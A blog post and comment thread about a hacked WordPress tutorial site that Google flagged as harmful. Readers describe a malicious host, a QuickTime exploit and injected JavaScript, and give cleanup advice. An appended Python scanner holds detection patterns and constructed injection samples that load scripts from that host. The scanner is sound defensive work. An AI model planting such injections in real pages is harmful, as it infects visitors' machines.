Help needed
This is what I found today in the Google search engine:

I know I shouldn't talk about attacks because it just makes more attacks happen, but this time I really don't know what to do.
I receive half of my traffic from Google and really don't know what to do.
I know my site was hacked, but over the last few days I manually cleaned the site.
I followed all the steps required by StopBadware.org, but the problem still remains.
If you have any clue, or should you find another harmful script from now on, can you please comment on the post with your problem/opinion?
15 Responses to “Help needed”
Trackbacks
2 years of blogging : Emanuele Feronato - italian geek and PROgrammer, on May 26th, 2008 4:21 pm
[...] A lot of funny things happened during this year… Google slapped me down from PR7 to PR4, then the site was hacked a dozen times and marked by Google as a harmful site. [...]

If you think you resolved the problem then you have to request a review from Google. Info in this link:
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
You may have followed the steps on StopBadware.org; however, as is said on the Google page:
“This identification is based in part on guidelines set by StopBadware.org. However, Google uses its own criteria,…”
Hi Emanuele,
I’ve been visiting your site for a long time now and I’m sorry you’ve had these attacks.
I’ve been very wary of checking your site recently as my anti-virus software constantly pops up stating that there is a malicious script on the page.
Unfortunately I can’t really lend much of a hand without seeing what exactly is going on with your code.
All I can advise is talking to the WordPress guys and doing some googling. If your database tables haven’t been compromised, or you have earlier backups, perhaps you should look into reinstalling WordPress and see if that cleans things up.
Do you know how they gained access to your site? I’d try going to a quality PHP help forum and asking their users to find XSS (cross-site scripting), MySQL injection etc. vulnerabilities. One such forum is http://www.phpfreaks.com/forums/. They have some really helpful guys over there who know their stuff.
Again, your best bet would be to go straight to WordPress and see if they have any answers. If I come across anything you may find useful I’ll definitely let you know.
Best of luck sorting it out and getting things back to normal!
- Adam Owen
Hi,
I can’t help with how to solve it, but if it is any help, my firewall blocked an attack when I accessed your site, reporting this: HTTP Quicktime RTSP URI BO. The attacking site was shown as ewbyuno.com. I don’t know anything about curing this though.
I’m sorry this has happened to your site; I visit it daily and find it excellent. Hope you find a way to solve it.
You may want to delete this comment to stop that threat report being picked up by Google and making your search report worse.
ok… time to buy google and fire some morons then…
Hi,
I’m sorry for what’s happening… But I can’t solve it. Try asking in a forum…
I’m here to make a suggestion: Can you explain how to do a game like this: http://www.newgrounds.com/portal/view/420167 ?
Thanks,
Gabriel…..
LOL what a game… sure I will do a tut for a game like this… reminds me of old C64 games… it’s a game with huge potential
are you being ironic? =DD
I made a quick search on ewbyuno.com and I found this: http://www.phpbb.com/community/viewtopic.php?f=1&t=698065&p=3888725
I hope it can help.
I’d blacklist this site (ewbyuno) as soon as possible.
A while ago there was some “unresponsive script” on your site - I assume it was coming from one of the Flash ads. Maybe this was the source of Google’s claims? This seems unlikely because it’s only Flash, and wouldn’t be the cause of installing spyware etc., but it could still be worth investigating.
Still, whatever Google thinks I will be sure to keep visiting your website (and recommending that all my friends go) as it provides useful, easy-to-follow tutorials!
Hey Emanuele, your site causes problems on a great many PCs.. for example, looking at it from the office I don’t even have time to get it open before it gives me display errors and then freezes Explorer!!!!
Some of the Flash tutorials, especially the ones after the hacker attack, make the page hang as if the Flash were going into a loop for some reason!
I hope I’ve been of help!!!
Massy
http://www.flashwizardgames.com - visit my site
When I go to your site a bar comes up about some plugin thing to do with ActiveX or something… that might have something to do with it.
On the homepage of this site, ewbyuno is trying to run scripts. I have an add-on for Firefox which blocks all scripts unless I allow them, so I hadn’t noticed it before.
It is these foolish ads from Zapak and Amazon in your blank spaces.
I think these are causing the problems.
Or, have you seen any social networking site?
If anyone wants to read your site, he should first sign in.
It would prevent it somehow.
I actually got the Backdoor-Icug keylogging trojan (http://vil.nai.com/vil/content/v_142500.htm) from your site a while back. I had old versions of the Flash player (r47) and QuickTime installed. Adobe and Apple have since released security notices for these versions. I reported the problems to Mozilla and they’re working on a way to disable old plugins automatically, but it’s not ready yet.
Anyway, after cleaning things up, reinstalling, and updating my versions, I visited your site again in forensic mode and I found various JavaScript injection exploits on your site, one of which tried to inject a bad QT stream as someone above mentioned. It looks like there is still bad JS in syntax_hilite_js.js, for example.
I think you need to assume your site and your personal computers have been completely compromised with keyloggers that have detected your passwords and everything, and treat everything as infected and install fresh from original media (be careful about XP before you’ve done all the security updates; hopefully you have a firewall at home, but also make sure it is not set up for remote administration). Do a database backup of your blog so you don’t lose the great material you’ve written, but after you’ve backed up the data, call your ISP on the phone and have them wipe your account and then verbally tell you the password, and then don’t enter it until you’ve wiped your machine and reinstalled the OS from the original CDs. I would also change all of your bank passwords and whatnot since these keyloggers often look for bank website logins.
Good luck,
Chris
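As an added example (not code from the post or from any commenter), here is a small defensive scanner for the kind of leftover injections the thread describes: script or iframe sources pointing at hosts outside an assumed allowlist (`ALLOWED_HOSTS` is hypothetical), percent-encoded `document.write` payloads, zero-size iframes and `eval(unescape(...))` patterns. The sample file contents are constructed; `ewbyuno.com` is the host the commenters observed.

```python
import re
from pathlib import Path
from urllib.parse import unquote, urlparse

# Assumed allowlist: hosts this site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.emanueleferonato.com", "www.google-analytics.com"}

SRC_RE = re.compile(r'<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
EVAL_RE = re.compile(r'\beval\s*\(\s*(?:unescape|String\.fromCharCode)\b', re.I)
HIDDEN_RE = re.compile(r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0\b', re.I)

def external_host(url):
    """Hostname for absolute or protocol-relative URLs; None for local paths."""
    if url.startswith("//"):
        url = "http:" + url
    return urlparse(url).hostname if "://" in url else None

def suspicious_refs(text, allowed=ALLOWED_HOSTS):
    """Return (reason, detail) findings for one file's content."""
    text = unquote(text)  # expose document.write(unescape('%3Cscript...')) payloads
    findings = []
    for url in SRC_RE.findall(text):
        host = external_host(url)
        if host and host not in allowed:
            findings.append(("external-src", host))
    if EVAL_RE.search(text):
        findings.append(("obfuscated-eval", "eval(unescape/fromCharCode"))
    if HIDDEN_RE.search(text):
        findings.append(("hidden-iframe", "zero-size iframe"))
    return findings

def scan_tree(root, exts=(".js", ".php", ".html")):
    """Walk a web root and map each file that has findings to its findings."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = suspicious_refs(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

# Constructed samples: one clean file and two injected ones like those reported above.
SAMPLES = {
    "wp-includes/js/jquery.js": "var jQuery = {};",
    "syntax_hilite_js.js": 'document.write(unescape("%3Cscript src=%22http://ewbyuno.com/in.js%22%3E%3C/script%3E"));',
    "index.php": '<iframe src="http://ewbyuno.com/q.mov" width=0 height=0></iframe>',
}

def scan_samples():
    """Run the scanner over the constructed samples (no filesystem needed)."""
    hits = {name: suspicious_refs(text) for name, text in SAMPLES.items()}
    return {name: h for name, h in hits.items() if h}
```

Run `scan_tree("/path/to/webroot")` against a copy of the site to list files worth diffing against a fresh WordPress install.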